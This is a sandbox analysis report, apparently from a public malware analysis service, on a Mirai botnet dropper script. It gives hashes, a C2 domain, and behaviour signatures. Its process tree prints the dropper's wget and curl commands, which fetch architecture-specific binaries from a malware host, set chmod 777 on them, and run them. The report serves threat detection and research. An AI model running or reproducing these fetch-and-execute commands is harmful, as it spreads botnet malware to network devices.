Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

ohshit.sh

ubuntu-18.04-amd64

10

ohshit.sh

debian-9-armhf

10

ohshit.sh

debian-9-mips

10

ohshit.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    141s
  • max time network
    142s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    11/03/2025, 14:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    d2fc82c2b868db8956bd1a152673f5a7

  • SHA1

    01899c680da79b2e7302f5898e150254bd7ef207

  • SHA256

    29eae7a3fc0f8f73775f7202b9b7972c62a40320b7331588db4e8cf560749719

  • SHA512

    5b9cf48ea5473fab850d23cf04d1d56ebcf7046c6cdfa72524d4c9af7f40721a059e622082250df23c2f6d1766bfce740b906d477fc28f2594e13d1879e121d2

Score
10/10
miraibotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

C2

huyhoangluvnhi.duckdns.org

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 15 IoCs
  • Enumerates active TCP sockets 1 TTPs 13 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 14 IoCs
  • Reads system network configuration 1 TTPs 13 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 28 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:711
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.x86
      2⤵
      • Writes file to tmp directory
      PID:714
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.x86
      2⤵
      • Writes file to tmp directory
      PID:740
    • /bin/cat
      cat blah.x86
      2⤵
        PID:741
      • /bin/chmod
        chmod 777 blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
        2⤵
        • File and Directory Permissions Modification
        PID:742
      • /tmp/HOLYLOVE
        ./HOLYLOVE
        2⤵
          PID:743
        • /usr/bin/wget
          wget http://160.191.245.152/dlr/blah.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:745
        • /usr/bin/curl
          curl -O http://160.191.245.152/dlr/blah.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:746
        • /bin/cat
          cat blah.mips
          2⤵
          • System Network Configuration Discovery
          PID:772
        • /bin/chmod
          chmod 777 blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
          2⤵
          • File and Directory Permissions Modification
          PID:774
        • /tmp/HOLYLOVE
          ./HOLYLOVE
          2⤵
          • Changes its process name
          • Reads runtime system information
          PID:775
        • /usr/bin/wget
          wget http://160.191.245.152/dlr/blah.arc
          2⤵
            PID:777
          • /usr/bin/curl
            curl -O http://160.191.245.152/dlr/blah.arc
            2⤵
            • Writes file to tmp directory
            PID:794
          • /bin/chmod
            chmod 777 blah.arc blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
            2⤵
            • File and Directory Permissions Modification
            PID:800
          • /tmp/HOLYLOVE
            ./HOLYLOVE
            2⤵
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:801
          • /usr/bin/wget
            wget http://160.191.245.152/dlr/blah.i468
            2⤵
              PID:834
            • /usr/bin/curl
              curl -O http://160.191.245.152/dlr/blah.i468
              2⤵
              • Writes file to tmp directory
              PID:835
            • /bin/chmod
              chmod 777 blah.arc blah.i468 blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
              2⤵
              • File and Directory Permissions Modification
              PID:837
            • /tmp/HOLYLOVE
              ./HOLYLOVE
              2⤵
              • Enumerates active TCP sockets
              • Changes its process name
              • Reads system network configuration
              • Reads runtime system information
              PID:838
            • /usr/bin/wget
              wget http://160.191.245.152/dlr/blah.i686
              2⤵
                PID:840
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.i686
                2⤵
                • Writes file to tmp directory
                PID:842
              • /bin/chmod
                chmod 777 blah.arc blah.i468 blah.i686 blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
                2⤵
                • File and Directory Permissions Modification
                PID:844
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:845
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.x86_64
                2⤵
                • Writes file to tmp directory
                PID:850
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.x86_64
                2⤵
                • Writes file to tmp directory
                PID:852
              • /bin/chmod
                chmod 777 blah.arc blah.i468 blah.i686 blah.mips blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
                2⤵
                • File and Directory Permissions Modification
                PID:854
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:855
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.mpsl
                2⤵
                • Writes file to tmp directory
                PID:857
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.mpsl
                2⤵
                • Writes file to tmp directory
                PID:859
              • /bin/chmod
                chmod 777 blah.arc blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
                2⤵
                • File and Directory Permissions Modification
                PID:861
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:862
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.arm
                2⤵
                • Writes file to tmp directory
                PID:864
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.arm
                2⤵
                • Writes file to tmp directory
                PID:866
              • /bin/chmod
                chmod 777 blah.arc blah.arm blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
                2⤵
                • File and Directory Permissions Modification
                PID:868
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:869
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.arm5
                2⤵
                • Writes file to tmp directory
                PID:871
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.arm5
                2⤵
                • Writes file to tmp directory
                PID:873
              • /bin/chmod
                chmod 777 blah.arc blah.arm blah.arm5 blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
                2⤵
                • File and Directory Permissions Modification
                PID:875
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:876
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.arm6
                2⤵
                • Writes file to tmp directory
                PID:878
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.arm6
                2⤵
                • Writes file to tmp directory
                PID:880
              • /bin/chmod
                chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
                2⤵
                • File and Directory Permissions Modification
                PID:882
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:883
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.arm7
                2⤵
                • Writes file to tmp directory
                PID:885
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.arm7
                2⤵
                • Writes file to tmp directory
                PID:887
              • /bin/chmod
                chmod 777 HOLYLOVE blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
                2⤵
                • File and Directory Permissions Modification
                PID:889
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:890
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.ppc
                2⤵
                • Writes file to tmp directory
                PID:892
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.ppc
                2⤵
                • Writes file to tmp directory
                PID:894
              • /bin/chmod
                chmod 777 HOLYLOVE blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.mips blah.mpsl blah.ppc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
                2⤵
                • File and Directory Permissions Modification
                PID:896
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:897
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.spc
                2⤵
                • Writes file to tmp directory
                PID:899
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.spc
                2⤵
                • Writes file to tmp directory
                PID:901
              • /bin/chmod
                chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.mips blah.mpsl blah.ppc blah.spc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh HOLYLOVE
                2⤵
                • File and Directory Permissions Modification
                PID:903
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:904
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.m68k
                2⤵
                • Writes file to tmp directory
                PID:906
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.m68k
                2⤵
                • Writes file to tmp directory
                PID:908
              • /bin/chmod
                chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.m68k blah.mips blah.mpsl blah.ppc blah.spc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh HOLYLOVE
                2⤵
                • File and Directory Permissions Modification
                PID:910
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:911
              • /usr/bin/wget
                wget http://160.191.245.152/dlr/blah.sh4
                2⤵
                • Writes file to tmp directory
                PID:913
              • /usr/bin/curl
                curl -O http://160.191.245.152/dlr/blah.sh4
                2⤵
                • Writes file to tmp directory
                PID:915
              • /bin/chmod
                chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.m68k blah.mips blah.mpsl blah.ppc blah.sh4 blah.spc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh HOLYLOVE
                2⤵
                • File and Directory Permissions Modification
                PID:917
              • /tmp/HOLYLOVE
                ./HOLYLOVE
                2⤵
                • Enumerates active TCP sockets
                • Changes its process name
                • Reads system network configuration
                • Reads runtime system information
                PID:918

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/HOLYLOVE
              Filesize

              58KB

              MD5

              1c8b6437a383e5816d7444525fc1508b

              SHA1

              4eefd8b14e3f7ac66a30f73b495b40839e5f6bb4

              SHA256

              1e74b70fafd03b372bd8f0b932ae682ab2ea7b73f69744dfc26e24385f23f569

              SHA512

              4acca052eece00944ceb143a6c898b4ce03061d4ad36598347128388ad5399431c0e989a2c7a6f2c1689e65ed34c25390d197492b6169ed1942cd928d331857c

              Download Submit

            • /tmp/blah.x86
              Filesize

              40KB

              MD5

              2e689db77eaea41c04a31165f6ee7184

              SHA1

              170440f67d1eba5b252aa5bc6e2f0a026b6c8cef

              SHA256

              2ce9fb3fae4dd2c0540e15c416d79a33933b714551d6016b28ddaa0f52a06913

              SHA512

              5bc67648bb6650b1c6b4e1a9ca39cfb9dc719b7d670f83647445411df348e05ad1a06b0ae85e91625ec38bc18b4e5b75ba40f06c8652c025c7abfaa8513c00b4

              Download Submit